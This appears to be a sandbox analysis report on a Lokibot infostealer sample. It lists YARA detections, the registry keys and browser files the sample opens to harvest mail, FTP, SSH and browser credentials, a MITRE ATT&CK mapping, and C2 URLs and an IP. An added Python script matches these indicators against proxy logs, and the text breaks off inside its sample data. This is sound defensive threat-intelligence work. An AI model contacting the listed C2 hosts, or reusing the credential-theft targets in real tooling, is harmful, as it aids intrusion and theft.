                Source: 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000000.295652868.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000003.00000000.295652868.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000002.553100353.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000003.00000002.553100353.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: C:\Users\user\Desktop\__.exeCode function: 2_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
                Source: C:\Users\user\Desktop\__.exeCode function: 2_2_0040604C
                Source: C:\Users\user\Desktop\__.exeCode function: 2_2_00404772
                Source: C:\Users\user\Desktop\__.exeCode function: 3_2_0040549C
                Source: C:\Users\user\Desktop\__.exeCode function: 3_2_004029D4
                Source: C:\Users\user\Desktop\__.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\Desktop\__.exeCode function: String function: 00405B6F appears 42 times
                Source: __.exe, 00000002.00000003.293725132.00000000031B6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs __.exe
                Source: __.exe, 00000002.00000003.292979079.000000000334F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs __.exe
                Source: __.exeVirustotal: Detection: 34%
                Source: __.exeReversingLabs: Detection: 39%
                Source: C:\Users\user\Desktop\__.exeFile read: C:\Users\user\Desktop\__.exeJump to behavior
                Source: __.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\__.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\__.exe "C:\Users\user\Desktop\__.exe"
                Source: C:\Users\user\Desktop\__.exeProcess created: C:\Users\user\Desktop\__.exe "C:\Users\user\Desktop\__.exe"
                Source: C:\Users\user\Desktop\__.exeProcess created: C:\Users\user\Desktop\__.exe "C:\Users\user\Desktop\__.exe"
                Source: C:\Users\user\Desktop\__.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Users\user\Desktop\__.exeCode function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
                Source: C:\Users\user\Desktop\__.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                Source: C:\Users\user\Desktop\__.exeFile created: C:\Users\user\AppData\Local\Temp\nsjD67.tmpJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/6@56/1
                Source: C:\Users\user\Desktop\__.exeCode function: 2_2_00402012 CoCreateInstance,MultiByteToWideChar,
                Source: C:\Users\user\Desktop\__.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\__.exeCode function: 2_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
                Source: C:\Users\user\Desktop\__.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                Source: C:\Users\user\Desktop\__.exe, File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\Desktop\__.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
                Source: Binary string: wntdll.pdbUGP, source: __.exe, 00000002.00000003.291276471.00000000030A0000.00000004.00000001.sdmp, __.exe, 00000002.00000003.292633393.0000000003230000.00000004.00000001.sdmp
                Source: Binary string: wntdll.pdb, source: __.exe, 00000002.00000003.291276471.00000000030A0000.00000004.00000001.sdmp, __.exe, 00000002.00000003.292633393.0000000003230000.00000004.00000001.sdmp

                Data Obfuscation:

                Yara detected aPLib compressed binary
                Source: Yara match, File source: 3.0.__.exe.400000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.0.__.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.0.__.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.0.__.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.0.__.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.__.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.0.__.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.1.__.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.2.__.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.0.__.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.0.__.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.1.__.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.0.__.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.2.__.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.__.exe.23e0000.3.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.0.__.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000000.294708391.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000000.296551442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000000.295652868.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.553100353.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: __.exe PID: 7040, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: __.exe PID: 5768, type: MEMORYSTR
                Source: C:\Users\user\Desktop\__.exe, Code function: 2_2_738D1000 push eax; ret
                Source: C:\Users\user\Desktop\__.exe, Code function: 3_2_00402AC0 push eax; ret
                Source: C:\Users\user\Desktop\__.exe, Code function: 2_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
                Source: C:\Users\user\Desktop\__.exe, File created: C:\Users\user\AppData\Local\Temp\nsjD69.tmp\firfslz.dll
                Source: C:\Users\user\Desktop\__.exe, Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\__.exe, Process information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\Desktop\__.exe TID: 6184, Thread sleep time: -720000s >= -30000s
                Source: C:\Users\user\Desktop\__.exe, Code function: 2_2_00405D7C FindFirstFileA,FindClose,
                Source: C:\Users\user\Desktop\__.exe, Code function: 2_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
                Source: C:\Users\user\Desktop\__.exe, Code function: 2_2_00402630 FindFirstFileA,
                Source: C:\Users\user\Desktop\__.exe, Code function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
                Source: C:\Users\user\Desktop\__.exe, Thread delayed: delay time: 60000
                Source: C:\Users\user\Desktop\__.exe, API call chain: ExitProcess graph end node
                Source: C:\Users\user\Desktop\__.exe, Code function: 2_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
                Source: C:\Users\user\Desktop\__.exe, Code function: 3_2_00402B7C GetProcessHeap,RtlAllocateHeap,
                Source: C:\Users\user\Desktop\__.exe, Process token adjusted: Debug
                Source: C:\Users\user\Desktop\__.exe, Code function: 2_2_0019E886 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\__.exe, Code function: 2_2_0019E672 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\__.exe, Code function: 2_2_0019E9B4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\__.exe, Code function: 2_2_0019E937 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\__.exe, Code function: 2_2_0019E976 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\__.exe, Code function: 3_2_0040317B mov eax, dword ptr fs:[00000030h]

                HIPS / PFW / Operating System Protection Evasion:

                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\__.exe, Memory written: C:\Users\user\Desktop\__.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\__.exe, Process created: C:\Users\user\Desktop\__.exe "C:\Users\user\Desktop\__.exe"
                Source: __.exe, 00000003.00000002.553478796.0000000000E30000.00000002.00020000.sdmp, Binary or memory string: Program Manager
                Source: __.exe, 00000003.00000002.553478796.0000000000E30000.00000002.00020000.sdmp, Binary or memory string: Shell_TrayWnd
                Source: __.exe, 00000003.00000002.553478796.0000000000E30000.00000002.00020000.sdmp, Binary or memory string: Progman
                Source: __.exe, 00000003.00000002.553478796.0000000000E30000.00000002.00020000.sdmp, Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\__.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\Desktop\__.exe, Code function: 2_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,
                Source: C:\Users\user\Desktop\__.exe, Code function: 3_2_00406069 GetUserNameW,

                Stealing of Sensitive Information:

                barindex
                Yara detected LokibotShow sources
                Source: Yara matchFile source: 00000003.00000002.553223743.00000000007A7000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.316225767.00000000007BD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: __.exe PID: 5768, type: MEMORYSTR
                Source: Yara matchFile source: 3.0.__.exe.400000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.__.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.1.__.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.__.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.1.__.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.__.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.0.__.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.294708391.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.296551442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000000.295652868.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.553100353.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: __.exe PID: 7040, type: MEMORYSTR
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\__.exe, key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\Desktop\__.exe, key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Users\user\Desktop\__.exe, key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                Source: C:\Users\user\Desktop\__.exe, key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\__.exe, key opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                Source: C:\Users\user\Desktop\__.exe, key opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                Source: C:\Users\user\Desktop\__.exe, key opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                Source: C:\Users\user\Desktop\__.exe, key opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                Tries to steal Mail credentials (via file registry)
                Source: C:\Users\user\Desktop\__.exe, code function: PopPassword
                Source: C:\Users\user\Desktop\__.exe, code function: SmtpPassword
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\__.exe, file opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: Yara match, file source: 3.0.__.exe.400000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 3.0.__.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 3.0.__.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 3.0.__.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 3.0.__.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 2.2.__.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 3.0.__.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 3.1.__.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 3.2.__.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 3.0.__.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 3.0.__.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 3.1.__.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 3.0.__.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 3.2.__.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 3.0.__.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match, file source: 00000003.00000000.294708391.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match, file source: 00000003.00000000.296551442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match, file source: 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000003.00000000.295652868.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match, file source: 00000003.00000002.553100353.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match, file source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, type: MEMORY

                Remote Access Functionality:

                Yara detected Lokibot
                Source: Yara match, file source: 00000003.00000002.553223743.00000000007A7000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara match, file source: 00000003.00000003.316225767.00000000007BD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match, file source: Process Memory Space: __.exe PID: 5768, type: MEMORYSTR
                Source: Yara match, file source: 3.0.__.exe.400000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 3.0.__.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 3.0.__.exe.400000.3.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 3.0.__.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 3.0.__.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 2.2.__.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 3.0.__.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 3.1.__.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 3.2.__.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 3.0.__.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 3.0.__.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 3.1.__.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 3.0.__.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 3.2.__.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 3.0.__.exe.400000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match, file source: 00000003.00000000.294708391.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match, file source: 00000003.00000000.296551442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match, file source: 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000003.00000000.295652868.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match, file source: 00000003.00000002.553100353.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match, file source: 00000002.00000002.299558111.00000000023E0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match, file source: Process Memory Space: __.exe PID: 7040, type: MEMORYSTR

                Mitre Att&ck Matrix

                The matrix is listed per tactic. A number in brackets is the report's matched-signature counter for that technique, copied as extracted; techniques without a number are the standard matrix entries that no signature matched.

                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                Execution: Native API (1); Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
                Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
                Privilege Escalation: Access Token Manipulation (1); Process Injection (112); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
                Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (1); Masquerading (1); Virtualization/Sandbox Evasion (11); Access Token Manipulation (1); Process Injection (112); Indicator Removal from Tools
                Credential Access: OS Credential Dumping (2); Credentials in Registry (2); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                Discovery: Account Discovery (1); File and Directory Discovery (2); System Information Discovery (5); Security Software Discovery (11); Process Discovery (1); Virtualization/Sandbox Evasion (11); System Owner/User Discovery (1); Remote System Discovery (1)
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
                Collection: Archive Collected Data (1); Data from Local System (2); Email Collection (1); Clipboard Data (1); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Command and Control: Ingress Tool Transfer (3); Encrypted Channel (1); Non-Application Layer Protocol (3); Application Layer Protocol (113); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
                Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
                Impact: System Shutdown/Reboot (1); Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

                Behavior Graph

                [behavior graph image not reproduced]

                Screenshots

                [screenshot thumbnails not reproduced]

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                Source | Detection | Scanner | Label
                __.exe | 35% | Virustotal | -
                __.exe | 40% | ReversingLabs | Win32.Worm.SpyBot
                __.exe | 100% | Joe Sandbox ML | -

                Dropped Files

                Source | Detection | Scanner | Label
                C:\Users\user\AppData\Local\Temp\nsjD69.tmp\firfslz.dll | 14% | Virustotal | -
                C:\Users\user\AppData\Local\Temp\nsjD69.tmp\firfslz.dll | 8% | ReversingLabs | Win32.Trojan.Pwsx

                Unpacked PE Files

                Source | Detection | Scanner | Label
                3.0.__.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                3.0.__.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                3.0.__.exe.400000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                3.1.__.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                3.0.__.exe.400000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                3.0.__.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                3.0.__.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen2
                3.0.__.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                3.2.__.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                2.2.__.exe.23e0000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

                Domains

                Source | Detection | Scanner | Label
                slimpackage.com | 5% | Virustotal | -

                URLs

                Source | Detection | Scanner | Label
                http://slimpackage.com/slimmain/five/fre.php3 | 100% | Avira URL Cloud | malware
                http://kbfvzoboss.bid/alien/fre.php | 0% | URL Reputation | safe
                http://alphastand.win/alien/fre.php | 0% | URL Reputation | safe
                http://alphastand.trade/alien/fre.php | 0% | URL Reputation | safe
                http://alphastand.top/alien/fre.php | 0% | URL Reputation | safe
                http://www.ibsensoftware.com/ | 0% | URL Reputation | safe
                http://slimpackage.com/slimmain/five/fre.php | 100% | Avira URL Cloud | malware

                Domains and IPs

                Contacted Domains

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                slimpackage.com | 104.223.93.105 | true | true | - | unknown

                Contacted URLs

                Name | Malicious | Antivirus Detection | Reputation
                http://kbfvzoboss.bid/alien/fre.php | true | URL Reputation: safe | unknown
                http://alphastand.win/alien/fre.php | true | URL Reputation: safe | unknown
                http://alphastand.trade/alien/fre.php | true | URL Reputation: safe | unknown
                http://alphastand.top/alien/fre.php | true | URL Reputation: safe | unknown
                http://slimpackage.com/slimmain/five/fre.php | true | Avira URL Cloud: malware | unknown

                URLs from Memory and Binaries

                Name | Source | Malicious | Antivirus Detection | Reputation
                http://slimpackage.com/slimmain/five/fre.php3 | __.exe, 00000003.00000003.422484605.00000000007BC000.00000004.00000001.sdmp; __.exe, 00000003.00000003.316225767.00000000007BD000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
                http://nsis.sf.net/NSIS_Error | __.exe | false | - | high
                http://nsis.sf.net/NSIS_ErrorError | __.exe | false | - | high
                http://www.ibsensoftware.com/ | __.exe; __.exe, 00000003.00000000.293455627.0000000000400000.00000040.00000001.sdmp; __.exe, 00000003.00000001.298801287.0000000000400000.00000040.00020000.sdmp | false | URL Reputation: safe | unknown

                Contacted IPs

                Public

                IP | Domain | Country | ASN | ASN Name | Malicious
                104.223.93.105 | slimpackage.com | United States | 8100 | ASN-QUADRANET-GLOBALUS | true
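The network indicators in the tables above are the slimpackage.com gate (the only host that resolved and was contacted in this run, at 104.223.93.105) and the four alien/fre.php URLs recovered from the binary, which URL reputation scores as "safe" even though the report lists them as malicious. The two verdicts are not in conflict: the reputation score reflects prior sightings, the malicious flag reflects this sample's configuration. The Python below is an added example written for this page, not output of Joe Sandbox and not code from the sample. It turns the report's indicators into a proxy-log check; the Squid-style log layout and the log lines themselves are constructed for the demonstration, and the "POST to any fre.php" rule is a heuristic (fre.php is the gate script of the Lokibot web panel), not something the report states.

```python
"""Match the network indicators from this report against proxy log lines.

Added example, not part of the Joe Sandbox report. The hosts, URL paths and
IP below are copied from the report's URL and IP tables; the log lines are
constructed for the demonstration and do not come from the analysis.
"""
import re
from urllib.parse import urlsplit

# Indicators copied from the report. "fre.php3" is listed by the report as
# its own string recovered from memory, so both forms are kept.
C2_URLS = [
    "http://slimpackage.com/slimmain/five/fre.php",
    "http://slimpackage.com/slimmain/five/fre.php3",
    "http://kbfvzoboss.bid/alien/fre.php",
    "http://alphastand.win/alien/fre.php",
    "http://alphastand.trade/alien/fre.php",
    "http://alphastand.top/alien/fre.php",
]
C2_IPS = {"104.223.93.105"}  # the only address actually contacted in the run

# http://www.ibsensoftware.com/ also appears in the report, but it is the
# aPLib decompressor's copyright banner inside the unpacked payload, not C2
# infrastructure, so it is deliberately not an indicator here.

C2_HOSTS = {urlsplit(u).hostname.lower() for u in C2_URLS}
C2_PATHS = {urlsplit(u).path for u in C2_URLS}

# Squid native access-log layout (assumed format for the constructed lines):
# <timestamp> <elapsed_ms> <client_ip> <result/status> <bytes> <method> <url> ...
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)"
)


def classify(line: str) -> list:
    """Return the reasons a proxy log line matches the report's indicators.

    An empty list means no match. Host, IP and path hits are strong matches.
    A POST to a bare "fre.php" on any other host is a weaker, generic signal
    (fre.php is the gate script of the Lokibot panel) and is only reported
    when the exact path is not already a known indicator.
    """
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("url"))
    host = (parts.hostname or "").lower()
    reasons = []
    if host in C2_HOSTS:
        reasons.append("known C2 host")
    if host in C2_IPS:
        reasons.append("known C2 IP")
    if parts.path in C2_PATHS:
        reasons.append("known C2 path")
    elif m.group("method") == "POST" and parts.path.endswith("/fre.php"):
        reasons.append("POST to fre.php (generic Lokibot panel pattern)")
    return reasons


def scan(lines):
    """Return [(line_number, reasons)] for every line that matched."""
    return [(i, r) for i, l in enumerate(lines, 1) if (r := classify(l))]


# Constructed sample lines; only the indicator values are real.
SAMPLE_LOG = [
    "1642152270.101 83 10.0.0.23 TCP_MISS/200 512 POST http://slimpackage.com/slimmain/five/fre.php - HIER_DIRECT/104.223.93.105 text/html",
    "1642152271.204 12 10.0.0.23 TCP_MISS/200 2048 GET http://www.ibsensoftware.com/ - HIER_DIRECT/203.0.113.9 text/html",
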